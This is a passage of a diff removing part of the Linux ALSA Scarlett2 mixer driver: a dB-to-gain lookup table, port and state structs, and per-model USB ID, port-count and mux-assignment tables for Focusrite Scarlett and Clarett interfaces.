+- * for dB in 0 .. 172: int(8192 * pow(10, ((dB - 160) / 2 / 20)))
+- */
+-static const u16 scarlett2_mixer_values[SCARLETT2_MIXER_VALUE_COUNT] = {
+-	0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2,
+-	2, 2, 3, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 6, 6, 6, 7, 7, 8, 8,
+-	9, 9, 10, 10, 11, 12, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
+-	23, 24, 25, 27, 29, 30, 32, 34, 36, 38, 41, 43, 46, 48, 51,
+-	54, 57, 61, 65, 68, 73, 77, 81, 86, 91, 97, 103, 109, 115,
+-	122, 129, 137, 145, 154, 163, 173, 183, 194, 205, 217, 230,
+-	244, 259, 274, 290, 307, 326, 345, 365, 387, 410, 434, 460,
+-	487, 516, 547, 579, 614, 650, 689, 730, 773, 819, 867, 919,
+-	973, 1031, 1092, 1157, 1225, 1298, 1375, 1456, 1543, 1634,
+-	1731, 1833, 1942, 2057, 2179, 2308, 2445, 2590, 2744, 2906,
+-	3078, 3261, 3454, 3659, 3876, 4105, 4349, 4606, 4879, 5168,
+-	5475, 5799, 6143, 6507, 6892, 7301, 7733, 8192, 8677, 9191,
+-	9736, 10313, 10924, 11571, 12257, 12983, 13752, 14567, 15430,
+-	16345
+-};
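+-
+-/* Worked examples of the mapping above: index 160 (0dB) gives
+- * int(8192 * pow(10, 0)) = 8192, and index 172 (+6dB) gives
+- * int(8192 * pow(10, 0.3)) = 16345, the largest entry in the table.
+- */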
+-
+-/* Maximum number of analogue outputs */
+-#define SCARLETT2_ANALOGUE_MAX 10
+-
+-/* Maximum number of level and pad switches */
+-#define SCARLETT2_LEVEL_SWITCH_MAX 2
+-#define SCARLETT2_PAD_SWITCH_MAX 8
+-#define SCARLETT2_AIR_SWITCH_MAX 8
+-#define SCARLETT2_PHANTOM_SWITCH_MAX 2
+-
+-/* Maximum number of inputs to the mixer */
+-#define SCARLETT2_INPUT_MIX_MAX 25
+-
+-/* Maximum number of outputs from the mixer */
+-#define SCARLETT2_OUTPUT_MIX_MAX 12
+-
+-/* Maximum size of the data in the USB mux assignment message:
+- * 20 inputs, 20 outputs, 25 matrix inputs, 12 spare
+- */
+-#define SCARLETT2_MUX_MAX 77
+-
+-/* Maximum number of meters (sum of output port counts) */
+-#define SCARLETT2_MAX_METERS 65
+-
+-/* There are three different sets of configuration parameters across
+- * the devices
+- */
+-enum {
+-	SCARLETT2_CONFIG_SET_NO_MIXER = 0,
+-	SCARLETT2_CONFIG_SET_GEN_2 = 1,
+-	SCARLETT2_CONFIG_SET_GEN_3 = 2,
+-	SCARLETT2_CONFIG_SET_CLARETT = 3,
+-	SCARLETT2_CONFIG_SET_COUNT = 4
+-};
+-
+-/* Hardware port types:
+- * - None (no input to mux)
+- * - Analogue I/O
+- * - S/PDIF I/O
+- * - ADAT I/O
+- * - Mixer I/O
+- * - PCM I/O
+- */
+-enum {
+-	SCARLETT2_PORT_TYPE_NONE     = 0,
+-	SCARLETT2_PORT_TYPE_ANALOGUE = 1,
+-	SCARLETT2_PORT_TYPE_SPDIF    = 2,
+-	SCARLETT2_PORT_TYPE_ADAT     = 3,
+-	SCARLETT2_PORT_TYPE_MIX      = 4,
+-	SCARLETT2_PORT_TYPE_PCM      = 5,
+-	SCARLETT2_PORT_TYPE_COUNT    = 6,
+-};
+-
+-/* Direction indices (in/out) used for the port_count arrays */
+-enum {
+-	SCARLETT2_PORT_IN    = 0,
+-	SCARLETT2_PORT_OUT   = 1,
+-	SCARLETT2_PORT_DIRNS = 2,
+-};
+-
+-/* Dim/Mute buttons on the 18i20 */
+-enum {
+-	SCARLETT2_BUTTON_MUTE    = 0,
+-	SCARLETT2_BUTTON_DIM     = 1,
+-	SCARLETT2_DIM_MUTE_COUNT = 2,
+-};
+-
+-static const char *const scarlett2_dim_mute_names[SCARLETT2_DIM_MUTE_COUNT] = {
+-	"Mute Playback Switch", "Dim Playback Switch"
+-};
+-
+-/* Description of each hardware port type:
+- * - id: hardware ID of this port type
+- * - src_descr: printf format string for mux input selections
+- * - src_num_offset: added to the channel number in the format string
+- * - dst_descr: printf format string for mixer controls
+- */
+-struct scarlett2_port {
+-	u16 id;
+-	const char * const src_descr;
+-	int src_num_offset;
+-	const char * const dst_descr;
+-};
+-
+-static const struct scarlett2_port scarlett2_ports[SCARLETT2_PORT_TYPE_COUNT] = {
+-	[SCARLETT2_PORT_TYPE_NONE] = {
+-		.id = 0x000,
+-		.src_descr = "Off"
+-	},
+-	[SCARLETT2_PORT_TYPE_ANALOGUE] = {
+-		.id = 0x080,
+-		.src_descr = "Analogue %d",
+-		.src_num_offset = 1,
+-		.dst_descr = "Analogue Output %02d Playback"
+-	},
+-	[SCARLETT2_PORT_TYPE_SPDIF] = {
+-		.id = 0x180,
+-		.src_descr = "S/PDIF %d",
+-		.src_num_offset = 1,
+-		.dst_descr = "S/PDIF Output %d Playback"
+-	},
+-	[SCARLETT2_PORT_TYPE_ADAT] = {
+-		.id = 0x200,
+-		.src_descr = "ADAT %d",
+-		.src_num_offset = 1,
+-		.dst_descr = "ADAT Output %d Playback"
+-	},
+-	[SCARLETT2_PORT_TYPE_MIX] = {
+-		.id = 0x300,
+-		.src_descr = "Mix %c",
+-		.src_num_offset = 'A',
+-		.dst_descr = "Mixer Input %02d Capture"
+-	},
+-	[SCARLETT2_PORT_TYPE_PCM] = {
+-		.id = 0x600,
+-		.src_descr = "PCM %d",
+-		.src_num_offset = 1,
+-		.dst_descr = "PCM %02d Capture"
+-	},
+-};
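+-
+-/* For example, the SCARLETT2_PORT_TYPE_MIX entry above produces mux
+- * source names "Mix A", "Mix B", ... (src_descr "Mix %c" with
+- * src_num_offset 'A'), while SCARLETT2_PORT_TYPE_ANALOGUE produces
+- * "Analogue 1", "Analogue 2", ...
+- */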
+-
+-/* Number of mux tables: one for each band of sample rates
+- * (44.1/48kHz, 88.2/96kHz, and 176.4/192kHz)
+- */
+-#define SCARLETT2_MUX_TABLES 3
+-
+-/* Maximum number of entries in a mux table */
+-#define SCARLETT2_MAX_MUX_ENTRIES 10
+-
+-/* One entry within mux_assignment defines the port type and range of
+- * ports to add to the set_mux message. The end of the list is marked
+- * with count == 0.
+- */
+-struct scarlett2_mux_entry {
+-	u8 port_type;
+-	u8 start;
+-	u8 count;
+-};
+-
+-struct scarlett2_device_info {
+-	u32 usb_id; /* USB device identifier */
+-
+-	/* Gen 3 devices have an internal MSD mode switch that needs
+-	 * to be disabled in order to access the full functionality of
+-	 * the device.
+-	 */
+-	u8 has_msd_mode;
+-
+-	/* which set of configuration parameters the device uses */
+-	u8 config_set;
+-
+-	/* line out hw volume is sw controlled */
+-	u8 line_out_hw_vol;
+-
+-	/* support for main/alt speaker switching */
+-	u8 has_speaker_switching;
+-
+-	/* support for talkback microphone */
+-	u8 has_talkback;
+-
+-	/* the number of analogue inputs with a software switchable
+-	 * level control that can be set to line or instrument
+-	 */
+-	u8 level_input_count;
+-
+-	/* the first input with a level control (0-based) */
+-	u8 level_input_first;
+-
+-	/* the number of analogue inputs with a software switchable
+-	 * 10dB pad control
+-	 */
+-	u8 pad_input_count;
+-
+-	/* the number of analogue inputs with a software switchable
+-	 * "air" control
+-	 */
+-	u8 air_input_count;
+-
+-	/* the number of phantom (48V) software switchable controls */
+-	u8 phantom_count;
+-
+-	/* the number of inputs each phantom switch controls */
+-	u8 inputs_per_phantom;
+-
+-	/* the number of direct monitor options
+-	 * (0 = none, 1 = mono only, 2 = mono/stereo)
+-	 */
+-	u8 direct_monitor;
+-
+-	/* remap analogue outputs; 18i8 Gen 3 has "line 3/4" connected
+-	 * internally to the analogue 7/8 outputs
+-	 */
+-	u8 line_out_remap_enable;
+-	u8 line_out_remap[SCARLETT2_ANALOGUE_MAX];
+-
+-	/* additional description for the line out volume controls */
+-	const char * const line_out_descrs[SCARLETT2_ANALOGUE_MAX];
+-
+-	/* number of sources/destinations of each port type */
+-	const int port_count[SCARLETT2_PORT_TYPE_COUNT][SCARLETT2_PORT_DIRNS];
+-
+-	/* layout/order of the entries in the set_mux message */
+-	struct scarlett2_mux_entry mux_assignment[SCARLETT2_MUX_TABLES]
+-						 [SCARLETT2_MAX_MUX_ENTRIES];
+-};
+-
+-struct scarlett2_data {
+-	struct usb_mixer_interface *mixer;
+-	struct mutex usb_mutex; /* prevent sending concurrent USB requests */
+-	struct mutex data_mutex; /* lock access to this data */
+-	struct delayed_work work;
+-	const struct scarlett2_device_info *info;
+-	__u8 bInterfaceNumber;
+-	__u8 bEndpointAddress;
+-	__u16 wMaxPacketSize;
+-	__u8 bInterval;
+-	int num_mux_srcs;
+-	int num_mux_dsts;
+-	u16 scarlett2_seq;
+-	u8 sync_updated;
+-	u8 vol_updated;
+-	u8 input_other_updated;
+-	u8 monitor_other_updated;
+-	u8 mux_updated;
+-	u8 speaker_switching_switched;
+-	u8 sync;
+-	u8 master_vol;
+-	u8 vol[SCARLETT2_ANALOGUE_MAX];
+-	u8 vol_sw_hw_switch[SCARLETT2_ANALOGUE_MAX];
+-	u8 mute_switch[SCARLETT2_ANALOGUE_MAX];
+-	u8 level_switch[SCARLETT2_LEVEL_SWITCH_MAX];
+-	u8 pad_switch[SCARLETT2_PAD_SWITCH_MAX];
+-	u8 dim_mute[SCARLETT2_DIM_MUTE_COUNT];
+-	u8 air_switch[SCARLETT2_AIR_SWITCH_MAX];
+-	u8 phantom_switch[SCARLETT2_PHANTOM_SWITCH_MAX];
+-	u8 phantom_persistence;
+-	u8 direct_monitor_switch;
+-	u8 speaker_switching_switch;
+-	u8 talkback_switch;
+-	u8 talkback_map[SCARLETT2_OUTPUT_MIX_MAX];
+-	u8 msd_switch;
+-	u8 standalone_switch;
+-	struct snd_kcontrol *sync_ctl;
+-	struct snd_kcontrol *master_vol_ctl;
+-	struct snd_kcontrol *vol_ctls[SCARLETT2_ANALOGUE_MAX];
+-	struct snd_kcontrol *sw_hw_ctls[SCARLETT2_ANALOGUE_MAX];
+-	struct snd_kcontrol *mute_ctls[SCARLETT2_ANALOGUE_MAX];
+-	struct snd_kcontrol *dim_mute_ctls[SCARLETT2_DIM_MUTE_COUNT];
+-	struct snd_kcontrol *level_ctls[SCARLETT2_LEVEL_SWITCH_MAX];
+-	struct snd_kcontrol *pad_ctls[SCARLETT2_PAD_SWITCH_MAX];
+-	struct snd_kcontrol *air_ctls[SCARLETT2_AIR_SWITCH_MAX];
+-	struct snd_kcontrol *phantom_ctls[SCARLETT2_PHANTOM_SWITCH_MAX];
+-	struct snd_kcontrol *mux_ctls[SCARLETT2_MUX_MAX];
+-	struct snd_kcontrol *direct_monitor_ctl;
+-	struct snd_kcontrol *speaker_switching_ctl;
+-	struct snd_kcontrol *talkback_ctl;
+-	u8 mux[SCARLETT2_MUX_MAX];
+-	u8 mix[SCARLETT2_INPUT_MIX_MAX * SCARLETT2_OUTPUT_MIX_MAX];
+-};
+-
+-/*** Model-specific data ***/
+-
+-static const struct scarlett2_device_info s6i6_gen2_info = {
+-	.usb_id = USB_ID(0x1235, 0x8203),
+-
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
+-	.level_input_count = 2,
+-	.pad_input_count = 2,
+-
+-	.line_out_descrs = {
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  4,  4 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = {  6,  6 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info s18i8_gen2_info = {
+-	.usb_id = USB_ID(0x1235, 0x8204),
+-
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
+-	.level_input_count = 2,
+-	.pad_input_count = 4,
+-
+-	.line_out_descrs = {
+-		"Monitor L",
+-		"Monitor R",
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8,  6 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = {  8, 18 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 10 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  4 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info s18i20_gen2_info = {
+-	.usb_id = USB_ID(0x1235, 0x8201),
+-
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
+-	.line_out_hw_vol = 1,
+-
+-	.line_out_descrs = {
+-		"Monitor L",
+-		"Monitor R",
+-		NULL,
+-		NULL,
+-		NULL,
+-		NULL,
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8, 10 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 18 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,     0,  8 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,     0,  4 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 10 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  6 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info solo_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8211),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_NO_MIXER,
+-	.level_input_count = 1,
+-	.level_input_first = 1,
+-	.air_input_count = 1,
+-	.phantom_count = 1,
+-	.inputs_per_phantom = 1,
+-	.direct_monitor = 1,
+-};
+-
+-static const struct scarlett2_device_info s2i2_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8210),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_NO_MIXER,
+-	.level_input_count = 2,
+-	.air_input_count = 2,
+-	.phantom_count = 1,
+-	.inputs_per_phantom = 2,
+-	.direct_monitor = 2,
+-};
+-
+-static const struct scarlett2_device_info s4i4_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8212),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
+-	.level_input_count = 2,
+-	.pad_input_count = 2,
+-	.air_input_count = 2,
+-	.phantom_count = 1,
+-	.inputs_per_phantom = 2,
+-
+-	.line_out_descrs = {
+-		"Monitor L",
+-		"Monitor R",
+-		"Headphones L",
+-		"Headphones R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = { 1, 0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = { 4, 4 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 6, 8 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = { 4, 6 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info s8i6_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8213),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
+-	.level_input_count = 2,
+-	.pad_input_count = 2,
+-	.air_input_count = 2,
+-	.phantom_count = 1,
+-	.inputs_per_phantom = 2,
+-
+-	.line_out_descrs = {
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = { 1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = { 6,  4 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = { 2,  2 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 8,  8 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = { 6, 10 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info s18i8_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8214),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
+-	.line_out_hw_vol = 1,
+-	.has_speaker_switching = 1,
+-	.level_input_count = 2,
+-	.pad_input_count = 4,
+-	.air_input_count = 4,
+-	.phantom_count = 2,
+-	.inputs_per_phantom = 2,
+-
+-	.line_out_remap_enable = 1,
+-	.line_out_remap = { 0, 1, 6, 7, 2, 3, 4, 5 },
+-
+-	.line_out_descrs = {
+-		"Monitor L",
+-		"Monitor R",
+-		"Alt Monitor L",
+-		"Alt Monitor R",
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8,  8 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 20 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = {  8, 20 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      12,  8 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      10,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
+-		{ 0,                             0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      12,  4 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      10,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
+-		{ 0,                             0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
+-		{ 0,                             0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info s18i20_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8215),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
+-	.line_out_hw_vol = 1,
+-	.has_speaker_switching = 1,
+-	.has_talkback = 1,
+-	.level_input_count = 2,
+-	.pad_input_count = 8,
+-	.air_input_count = 8,
+-	.phantom_count = 2,
+-	.inputs_per_phantom = 4,
+-
+-	.line_out_descrs = {
+-		"Monitor 1 L",
+-		"Monitor 1 R",
+-		"Monitor 2 L",
+-		"Monitor 2 R",
+-		NULL,
+-		NULL,
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  9, 10 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 12, 25 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 20 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0,  8 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      10, 10 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_PCM,       8,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,       0, 25 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 12 },
+-		{ 0,                             0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0,  8 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      10,  8 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_PCM,       8,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,       0, 25 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
+-		{ 0,                             0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 24 },
+-		{ 0,                             0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info clarett_8pre_info = {
+-	.usb_id = USB_ID(0x1235, 0x820c),
+-
+-	.config_set = SCARLETT2_CONFIG_SET_CLARETT,
+-	.line_out_hw_vol = 1,
+-	.level_input_count = 2,
+-	.air_input_count = 8,
+-
+-	.line_out_descrs = {
+-		"Monitor L",
+-		"Monitor R",
+-		NULL,
+-		NULL,
+-		NULL,
+-		NULL,
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8, 10 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 18 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
